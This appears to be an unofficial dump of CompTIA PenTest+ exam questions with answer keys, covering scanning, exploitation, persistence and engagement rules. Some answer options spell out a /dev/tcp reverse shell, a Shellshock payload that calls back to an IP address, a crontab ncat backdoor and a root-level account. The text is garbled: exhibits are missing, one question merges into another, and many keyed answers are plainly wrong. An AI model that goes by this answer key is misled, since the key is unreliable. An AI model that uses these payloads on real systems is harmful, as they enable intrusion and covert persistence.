PT0-002-dg-re-les3ks.pdf

Transcript

PT0-002 Exam

Exam PT0-002

Title CompTIA PenTest+

Product
68 Q&A with explanations
Type
QUESTION 1
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the
file owner?

A. chmod u+x script.sh
B. chmod u+e script.sh
C. chmod o+e script.sh
D. chmod o+x script.sh

Answer: A
Section: (none)
Explanation
Explanation/Reference:
Reference: https://newbedev.com/chmod-u-x-versus-chmod-x

QUESTION 2
A penetration tester gains access to a system and establishes persistence, and then run the following
commands:

Which of the following actions is the tester MOST likely performing?

A. Redirecting Bash history to /dev/null
B. Making a copy of the user’s Bash history to further enumeration
C. Covering tracks by clearing the Bash history
D. Making decoy files on the system to confuse incident responders

Answer: C
Section: (none)
Explanation
Explanation/Reference:
Reference: https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-
coveryour-
tracks-remain-undetected-0244768/
QUESTION 3
A compliance-based penetration test is primarily concerned with:

A. obtaining PII from the protected network.
B. bypassing protection on edge devices.
C. determining the efficacy of a specific set of security standards.
D. obtaining specific information from the protected network.

Answer: C
Section: (none)
Explanation
Explanation/Reference:

QUESTION 4
A penetration tester is explaining the MITRE ATT&CK framework to a company’s chief legal counsel.
Which of the following would the tester MOST likely describe as a benefit of the framework?

A. Understanding the tactics of a security intrusion can help disrupt them.
B. Scripts that are part of the framework can be imported directly into SIEM tools.
C. The methodology can be used to estimate the cost of an incident better.
D. The framework is static and ensures stability of a security program over time.

Answer: A
Section: (none)
Explanation
Explanation/Reference:
Reference: https://attack.mitre.org/

QUESTION 5
Which of the following BEST describe the OWASP Top 10? (Choose two.)

A. The most critical risks of web applications
B. A list of all the risks of web applications
C. The risks defined in order of importance
D. A web-application security standard
E. A risk-governance and compliance framework
F. A checklist of Apache vulnerabilities

Answer: A,C
Section: (none)
Explanation
Explanation/Reference:
Reference: https://www.synopsys.com/glossary/what-is-owasp-top-10.html

QUESTION 6
A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery
traversal. Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

A. Edit the discovered file with one line of code for remote callback.
B. Download.pl files and look for usernames and passwords.
C. Edit the smb.conf file and upload it to the server.
D. Download the smb.conf file and look at configurations.

Answer: C
Section: (none)
Explanation
Explanation/Reference:

QUESTION 7
A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test
the security of its hosted data.
Which of the following should the tester verify FIRST to assess this risk?

A. Whether sensitive client data is publicly accessible
B. Whether the connection between the cloud and the client is secure
C. Whether the client’s employees are trained properly to use the platform
D. Whether the cloud applications were developed using a secure SDLC

Answer: A
Section: (none)
Explanation
Explanation/Reference:

QUESTION 8
A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for
execution?

A. nc 10.10.51.50 9891 < exploit
B. powershell -exec bypass -f \\10.10.51.50\9891
C. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit
D. wget 10.10.51.50:9891/exploit

Answer: D
Section: (none)
Explanation
Explanation/Reference:

QUESTION 9
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the
code that was utilized:

Which of the following commands should the penetration tester run post-engagement?

A. grep -v apache ~/bash_history > ~/.bash_history
B. rm -rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IM ‘apache†/F

Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 10
Which of the following is MOST important to include in the final report of a static application-security test that
was written with a team of application developers as the intended audience?

A. Executive summary of the penetration-testing methods used
B. Bill of materials including supplies, subcontracts, and costs incurred during assessment
C. Quantitative impact assessments given a successful software compromise
D. Code context for instances of unsafe typecasting operations

Answer: C
Section: (none)
Explanation
Explanation/Reference:

QUESTION 11
SIMULATION
You are a penetration tester reviewing a client’s website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Answer: See explanation below.
Section: (none)
Explanation
Explanation/Reference:

Explanation:
Step 1: Generate Certificate Signing Request
Step 2: Submit CSR to the CA
Step 3: Remove certificate from the server
Step 4: Install re-issued certificate on the server

QUESTION 12
A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the
company’s employees.
Which of the following tools can help the tester achieve this goal?

A. Metasploit
B. Hydra
C. SET
D. WPScan
Answer: A
Section: (none)
Explanation
Explanation/Reference:

QUESTION 13
Which of the following is the MOST common vulnerability associated with IoT devices that are directly
connected to the Internet?

A. Unsupported operating systems
B. Susceptibility to DDoS attacks
C. Inability to network
D. The existence of default passwords

Answer: A
Section: (none)
Explanation
Explanation/Reference:

QUESTION 14
Which of the following describes the reason why a penetration tester would run the command sdelete
mimikatz. * on a Windows server that the tester compromised?

A. To remove hash-cracking registry entries
B. To remove the tester-created Mimikatz account
C. To remove tools from the server
D. To remove a reverse shell from the system

Answer: B
Section: (none)
Explanation
Explanation/Reference:

QUESTION 15
A penetration tester is scanning a corporate lab network for potentially vulnerable services.
Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential
attacker?

A. nmap 192.168.1.1-5 -PU22-25,80
B. nmap 192.168.1.1-5 -PA22-25,80
C. nmap 192.168.1.1-5 -PS22-25,80
D. nmap 192.168.1.1-5 -Ss22-25,80

Answer: C
Section: (none)
Explanation
Explanation/Reference:

QUESTION 16
A penetration tester was brute forcing an internal web server and ran a command that produced the following
output:
However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page
was displayed.
Which of the following is the MOST likely reason for the lack of output?

A. The HTTP port is not open on the firewall.
B. The tester did not run sudo before the command.
C. The web server is using HTTPS instead of HTTP.
D. This URI returned a server error.

Answer: A
Section: (none)
Explanation
Explanation/Reference:

QUESTION 17
A penetration tester was conducting a penetration test and discovered the network traffic was no longer
reaching the client’s IP address. The tester later discovered the SOC had used sinkholing on the penetration
tester’s IP address.
Which of the following MOST likely describes what happened?

A. The penetration tester was testing the wrong assets.
B. The planning process failed to ensure all teams were notified.
C. The client was not ready for the assessment to start.
D. The penetration tester had incorrect contact information.

Answer: B
Section: (none)
Explanation
Explanation/Reference:

QUESTION 18
An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan
and SQLmap to identify vulnerabilities and additional information about those systems.
Which of the following is the penetration tester trying to accomplish?

A. Uncover potential criminal activity based on the evidence gathered.
B. Identify all the vulnerabilities in the environment.
C. Limit invasiveness based on scope.
D. Maintain confidentiality of the findings.

Answer: C
Section: (none)
Explanation
Explanation/Reference:

QUESTION 19
A company hired a penetration tester to do a social-engineering test against its employees. Although the tester
did not find any employees’ phone numbers on the company’s website, the tester has learned the complete
phone catalog was published there a few months ago.
In which of the following places should the penetration tester look FIRST for the employees’ numbers?

A. Web archive
B. GitHub
C. File metadata
D. Underground forums

Answer: A
Section: (none)
Explanation
Explanation/Reference:

QUESTION 20
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has
an SSHD running.
Which of the following would BEST support this task?

A. Run nmap with the -O, -p22, and -sC options set against the target.
B. Run nmap with the -sV and -p22 options set against the target.
C. Run nmap with the --script vulners option set against the target.
D. Run nmap with the -sA option set against the target.

Answer: D
Section: (none)
Explanation
Explanation/Reference:

QUESTION 21
A penetration tester completed a vulnerability scan against a web server and identified a single but severe
vulnerability.
Which of the following is the BEST way to ensure this is a true positive?

A. Run another scanner to compare.
B. Perform a manual test on the server.
C. Check the results on the scanner.
D. Look for the vulnerability online.

Answer: B
Section: (none)
Explanation
Explanation/Reference:

QUESTION 22
A penetration tester has been given eight business hours to gain access to a client’s financial system.
Which of the following techniques will have the HIGHEST likelihood of success?

A. Attempting to tailgate an employee who is going into the client’s workplace
B. Dropping a malicious USB key with the company’s logo in the parking lot
C. Using a brute-force attack against the external perimeter to gain a foothold
D. Performing spear phishing against employees by posing as senior management

Answer: C
Section: (none)
Explanation
Explanation/Reference:

QUESTION 23
A company’s Chief Executive Officer has created a secondary home office and is concerned that the WiFi
service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi’s
router.
Which of the following is MOST vulnerable to a brute-force attack?

A. WPS
B. WPA2-EAP
C. WPA-TKIP
D. WPA2-PSK

Answer: A
Section: (none)
Explanation
Explanation/Reference:
Reference: https://us-cert.cisa.gov/ncas/alerts/TA12-006A

QUESTION 24
A penetration tester writes the following script:

Which of the following objectives is the tester attempting to achieve?

A. Determine active hosts on the network.
B. Set the TTL of ping packets for stealth.
C. Fill the ARP table of the networked devices.
D. Scan the system on the most used ports.

Answer: A
Section: (none)
Explanation
Explanation/Reference:

QUESTION 25
A penetration tester ran the following commands on a Windows server:

Which of the following should the tester do AFTER delivering the final report?

A. Delete the scheduled batch job.
B. Close the reverse shell connection.
C. Downgrade the svsaccount permissions.
D. Remove the tester-created credentials.

Answer: D
Section: (none)
Explanation
Explanation/Reference:

QUESTION 26
A penetration tester has established an on-path attack position and must now specially craft a DNS query
response to be sent back to a target host.
Which of the following utilities would BEST support this objective?

A. Socat
B. tcpdump
C. Scapy
D. dig

Answer: A
Section: (none)
Explanation
Explanation/Reference:

QUESTION 27
A penetration tester is starting an assessment but only has publicly available information about the target
company. The client is aware of this exercise and is preparing for the test.
Which of the following describes the scope of the assessment?

A. Partially known environment testing
B. Known environment testing
C. Unknown environment testing
D. Physical environment testing

Answer: C
Section: (none)
Explanation
Explanation/Reference:

QUESTION 28
The following line-numbered Python code snippet is being used in reconnaissance:
Which of the following line numbers from the script MOST likely contributed to the script triggering a
‘probable
port scan†alert in the organization’s IDS?

A. Line 01
B. Line 02
C. Line 07
D. Line 08
E. Line 12

Answer: A
Section: (none)
Explanation
Explanation/Reference:

QUESTION 29
A consulting company is completing the ROE during scoping.
Which of the following should be included in the ROE?

A. Cost of the assessment
B. Report distribution
C. Testing restrictions
D. Liability

Answer: B
Section: (none)
Explanation
Explanation/Reference:

QUESTION 30
A new client hired a penetration-testing company for a month-long contract for various security assessments
against the client’s new service. The client is expecting to make the new service publicly available shortly after
the assessment is complete and is planning to fix any findings, except for critical issues, after the service is
made public. The client wants a simple report structure and does not want to receive daily findings.
Which of the following is most important for the penetration tester to define FIRST?
A. Establish the format required by the client.
B. Establish the threshold of risk to escalate to the client immediately.
C. Establish the method of potential false positives.
D. Establish the preferred day of the week for reporting.

Answer: A
Section: (none)
Explanation
Explanation/Reference:

QUESTION 31
A penetration tester logs in as a user in the cloud environment of a company.
Which of the following Pacu modules will enable the tester to determine the level of access of the existing
user?

A. iam_enum_permissions
B. iam_prive_sc_scan
C. iam_backdoor_assume_role
D. iam_bruteforce_permissions

Answer: A
Section: (none)
Explanation
Explanation/Reference:

QUESTION 32
A company becomes concerned when the security alarms are triggered during a penetration test.
Which of the following should the company do NEXT?

A. Halt the penetration test.
B. Contact law enforcement.
C. Deconflict with the penetration tester.
D. Assume the alert is from the penetration test.

Answer: B
Section: (none)
Explanation
Explanation/Reference:

QUESTION 33
A penetration tester has been hired to perform a physical penetration test to gain access to a secure room
within a client’s building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple
security cameras connected to the Internet.
Which of the following tools or techniques would BEST support additional reconnaissance?

A. Wardriving
B. Shodan
C. Recon-ng
D. Aircrack-ng

Answer: C
Section: (none)
Explanation
Explanation/Reference:

QUESTION 34
A red team gained access to the internal network of a client during an engagement and used the Responder
tool to capture important data.
Which of the following was captured by the testing team?

A. Multiple handshakes
B. IP addresses
C. Encrypted file transfers
D. User hashes sent over SMB

Answer: D
Section: (none)
Explanation
Explanation/Reference:

QUESTION 35
A penetration tester conducts an Nmap scan against a target and receives the following results:

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

A. Nessus
B. ProxyChains
C. OWASP ZAP
D. Empire

Answer: B
Section: (none)
Explanation
Explanation/Reference:
Reference: https://www.codeproject.com/Tips/634228/How-to-Use-Proxychains-Forwarding-Ports

QUESTION 36
A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively
exploited by cybercriminals.
Which of the following should the tester do NEXT?

A. Reach out to the primary point of contact.
B. Try to take down the attackers.
C. Call law enforcement officials immediately.
D. Collect the proper evidence and add to the final report.

Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 37
A penetration tester received a.pcap file to look for credentials to use in an engagement.
Which of the following tools should the tester utilize to open and read the.pcap file?

A. Nmap
B. Wireshark
C. Metasploit
D. Netcat

Answer: B
Section: (none)
Explanation
Explanation/Reference:

QUESTION 38
A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a
few open ports. To further enumerate, the tester ran another scan using the following command:
nmap -O -A -sS -p- 100.100.100.50
Nmap returned that all 65,535 ports were filtered
Which of the following MOST likely occurred on the second scan?

A. A firewall or IPS blocked the scan.
B. The penetration tester used unsupported flags.
C. The edge network device was disconnected.
D. The scan returned ICMP echo replies.

Answer: A
Section: (none)
Explanation
Explanation/Reference:

QUESTION 39
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP
service that is used for a physical access control system. The service exists on more than 100 different hosts,
so the tester would like to automate the assessment. Identification requires the penetration tester to:
Have a full TCP connection
Send a ‘hello†payload
Wait for a response
Send a string of characters longer than 16 bytes
Which of the following approaches would BEST support the objective?

A. Run nmap -Pn -sV --script vuln.
B. Employ an OpenVAS simple scan against the TCP port of the host.
C. Create a script in the Lua language and use it with NSE.
D. Perform a credentialed scan with Nessus.

Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 40
Performing a penetration test against an environment with SCADA devices brings an additional safety risk
because the:

A. devices produce more heat and consume more power.
B. devices are obsolete and are no longer available for replacement.
C. protocols are more difficult to understand.
D. devices may cause physical world effects.

Answer: C
Section: (none)
Explanation
Explanation/Reference:

QUESTION 41
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range,
triggering as few alarms and countermeasures as possible.
Which of the following Nmap scan syntaxes would BEST accomplish this objective?

A. nmap -sT -vvv -O 192.168.1.2/24 -PO
B. nmap -sV 192.168.1.2/24 -PO
C. nmap -sA -v -O 192.168.1.2/24
D. nmap -sS -O 192.168.1.2/24 -T1

Answer: D
Section: (none)
Explanation
Explanation/Reference:
Reference: https://nmap.org/book/man-port-scanning-techniques.html

QUESTION 42
A penetration tester has gained access to a network device that has a previously unknown IP range on an
interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.
Which of the following is the BEST action for the penetration tester to take?

A. Utilize the tunnel as a means of pivoting to other internal devices.
B. Disregard the IP range, as it is out of scope.
C. Stop the assessment and inform the emergency contact.
D. Scan the IP range for additional systems to exploit.

Answer: D
Section: (none)
Explanation
Explanation/Reference:

QUESTION 43
A penetration tester recently performed a social-engineering attack in which the tester found an employee of
the target company at a local coffee shop and over time built a relationship with the employee. On the
employee’s birthday, the tester gave the employee an external hard drive as a gift.
Which of the following social-engineering attacks was the tester utilizing?

A. Phishing
B. Tailgating
C. Baiting
D. Shoulder surfing

Answer: C
Section: (none)
Explanation
Explanation/Reference:
Reference: https://phoenixnap.com/blog/what-is-social-engineering-types-of-threats

QUESTION 44
A security company has been contracted to perform a scoped insider-threat assessment to try to gain access
to the human resources server that houses PII and salary data. The penetration testers have been given an
internal network starting position.
Which of the following actions, if performed, would be ethical within the scope of the assessment?

A. Exploiting a configuration weakness in the SQL database
B. Intercepting outbound TLS traffic
C. Gaining access to hosts by injecting malware into the enterprise-wide update server
D. Leveraging a vulnerability on the internal CA to issue fraudulent client certificates
E. Establishing and maintaining persistence on the domain controller

Answer: B
Section: (none)
Explanation
Explanation/Reference:

QUESTION 45
A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server.
Which of the following can be done with the pcap to gain access to the server?

A. Perform vertical privilege escalation.
B. Replay the captured traffic to the server to recreate the session.
C. Use John the Ripper to crack the password.
D. Utilize a pass-the-hash attack.

Answer: D
Section: (none)
Explanation
Explanation/Reference:

QUESTION 46
Which of the following documents describes specific activities, deliverables, and schedules for a penetration
tester?

A. NDA
B. MSA
C. SOW
D. MOU

Answer: C
Section: (none)
Explanation
Explanation/Reference:

QUESTION 47
A penetration tester is exploring a client’s website. The tester performs a curl command and obtains the
following:
Which of the following tools would be BEST for the penetration tester to use to explore this site further?

A. Burp Suite
B. DirBuster
C. WPScan
D. OWASP ZAP

Answer: A
Section: (none)
Explanation
Explanation/Reference:

QUESTION 48
DRAG DROP
During a penetration test, you gain access to a system with a limited user interface. This machine appears to
have access to an isolated network that you would like to port scan.
INSTRUCTIONS
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Select and Place:
Correct Answer:
Section: (none)
Explanation
Explanation/Reference:

QUESTION 49
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and
passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and
serial numbers. The tester realizes some of the passwords in the text file follow the format:.
Which of the following would be the best action for the tester to take NEXT with this information?
A. Create a custom password dictionary as preparation for password spray testing.
B. Recommend using a password manager/vault instead of text files to store passwords securely.
C. Recommend configuring password complexity rules in all the systems and applications.
D. Document the unprotected file repository as a finding in the penetration-testing report.

Answer: D
Section: (none)
Explanation
Explanation/Reference:

QUESTION 50
When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be
explicitly specified.
Which of the following character combinations should be used on the first line of the script to accomplish this
goal?

A. &1†, ‘Accept†: ‘text/html,application/xhtml+xml,application/xml†}
Which of the following edits should the tester make to the script to determine the user context in which the
server is being run?

A. exploit = {‘User-Agent†: ‘() { ignored;};/bin/bash -i id;whoami†, ‘Accept†:
‘text/html,application/xhtml+xml,application/xml†}
B. exploit = {‘User-Agent†: ‘() { ignored;};/bin/bash -i>& find / -perm -4000†,
‘Accept†: ‘text/html,application/xhtml+xml,application/xml†}
C. exploit = {‘User-Agent†: ‘() { ignored;};/bin/sh -i ps -ef†0>&1†, ‘Accept†:
‘text/html,application/xhtml+xml,application/xml†}
D. exploit = {‘User-Agent†: ‘() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80â€
0>&1†‘Accept†: ‘text/html,application/xhtml+xml,application/xml†}

Answer: D
Section: (none)
Explanation
Explanation/Reference:

QUESTION 53
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company
operations.
Which of the following are considered passive reconnaissance tools? (Choose two.)

A. Wireshark
B. Nessus
C. Retina
D. Burp Suite
E. Shodan
F. Nikto

Answer: A,E
Section: (none)
Explanation
Explanation/Reference:
Reference: https://resources.infosecinstitute.com/topic/top-10-network-recon-tools/

QUESTION 54
A penetration tester wants to scan a target network without being detected by the client’s IDS.
Which of the following scans is MOST likely to avoid detection?

A. nmap -P0 -T0 -sS 192.168.1.10
B. nmap -sA -sV --host-timeout 60 192.168.1.10
C. nmap -f --badsum 192.168.1.10
D. nmap -A -n 192.168.1.10

Answer: A
Section: (none)
Explanation
Explanation/Reference:
Reference: https://www.oreilly.com/library/view/network-security-assessment/9780596510305/ch04.html
QUESTION 55
A penetration tester has been contracted to review wireless security. The tester has deployed a malicious
wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try
to force nearby wireless stations to connect to the malicious AP.
Which of the following steps should the tester take NEXT?

A. Send deauthentication frames to the stations.
B. Perform jamming on all 2.4GHz and 5GHz channels.
C. Set the malicious AP to broadcast within dynamic frequency selection channels.
D. Modify the malicious AP configuration to not use a preshared key.

Answer: C
Section: (none)
Explanation
Explanation/Reference:

QUESTION 56
SIMULATION
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available
options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack
vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Part 1

Part 2
Answer: See explanation below.
Section: (none)
Explanation
Explanation/Reference:

Explanation:
Part 1 – Enter command: nmap 192.168.2.2 -sV -O
Part 2 – Weak SMB file permissions

QUESTION 57
Which of the following protocols or technologies would in-transit confidentially protection for emailing the
final
security assessment report?

A. S/MIME
B. FTPS
C. DNSSEC
D. AS2

Answer: A
Section: (none)
Explanation
Explanation/Reference:

QUESTION 58
A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow
tables.
Which of the following should be included as a recommendation in the remediation report?

A. Stronger algorithmic requirements
B. Access controls on the server
C. Encryption on the user passwords
D. A patch management program

Answer: C
Section: (none)
Explanation
Explanation/Reference:

QUESTION 59
A penetration tester found the following valid URL while doing a manual assessment of a web application:
http://www.example.com/product.php?id=123987.
Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this
URL?

A. SQLmap
B. Nessus
C. Nikto
D. DirBuster

Answer: B
Section: (none)
Explanation
Explanation/Reference:

QUESTION 60
A penetration tester is attempting to discover live hosts on a subnet quickly.
Which of the following commands will perform a ping scan?

A. nmap -sn 10.12.1.0/24
B. nmap -sV -A 10.12.1.0/24
C. nmap -Pn 10.12.1.0/24
D. nmap -sT -p- 10.12.1.0/24

Answer: A
Section: (none)
Explanation
Explanation/Reference:
Reference: https://www.tecmint.com/find-live-hosts-ip-addresses-on-linux-network/

QUESTION 61
Which of the following tools would be MOST useful in collecting vendor and other security-relevant
information
for IoT devices to support passive reconnaissance?

A. Shodan
B. Nmap
C. WebScarab-NG
D. Nessus

Answer: B
Section: (none)
Explanation
Explanation/Reference:

QUESTION 62
Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a
cloud environment?

A. Whether the cloud service provider allows the penetration tester to test the environment
B. Whether the specific cloud services are being used by the application
C. The geographical location where the cloud services are running
D. Whether the country where the cloud service is based has any impeding laws

Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 63
HOTSPOT
You are a security analyst tasked with hardening a web server. You have been given a list of HTTP payloads
that were flagged as malicious.
INSTRUCTION
Giving the following attack signatures, determine the attack type, and then identify the associated remediation
to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

Correct Answer:
Section: (none)
Explanation
Explanation/Reference:

QUESTION 64
A penetration tester runs the unshadow command on a machine.
Which of the following tools will the tester most likely use NEXT?

A. John the Ripper
B. Hydra
C. Mimikatz
D. Cain and Abel

Answer: A
Section: (none)
Explanation
Explanation/Reference:

QUESTION 65
A penetration tester obtained the following results after scanning a web server using the dirb utility:

Which of the following elements is MOST likely to contain useful information for the penetration tester?

A. index.html
B. about
C. info
D. home.html

Answer: B
Section: (none)
Explanation
Explanation/Reference:

QUESTION 66
A company has hired a penetration tester to deploy and set up a rogue access point on the network.
Which of the following is the BEST tool to use to accomplish this goal?

A. Wireshark
B. Aircrack-ng
C. Kismet
D. Wifite

Answer: B
Section: (none)
Explanation
Explanation/Reference:
Reference: https://null-byte.wonderhowto.com/how-to/hack-wi-fi-stealing-wi-fi-passwords-with-evil-twin-
attack
0183880/
QUESTION 67
A penetration tester was able to gain access successfully to a Windows workstation on a mobile client’s laptop.
Which of the following can be used to ensure the tester is able to maintain access to the system?

A. schtasks /create /sc /ONSTART /tr C:\Temp|WindowsUpdate.exe
B. wmic startup get caption,command
C. crontab -l; echo ‘@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash†) | crontab
2>/dev/null
D. sudo useradd -ou 0 -g 0 user

Answer: B
Section: (none)
Explanation
Explanation/Reference:

QUESTION 68
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant.
The team immediately discovered the supervisory systems and PLCs are both connected to the company
intranet.
Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

A. PLCs will not act upon commands injected over the network.
B. Supervisors and controllers are on a separate virtual network by default.
C. Controllers will not validate the origin of commands.
D. Supervisory systems will detect a malicious injection of code/commands.

Answer: C
Section: (none)
Explanation
Explanation/Reference:
Explanation/Reference: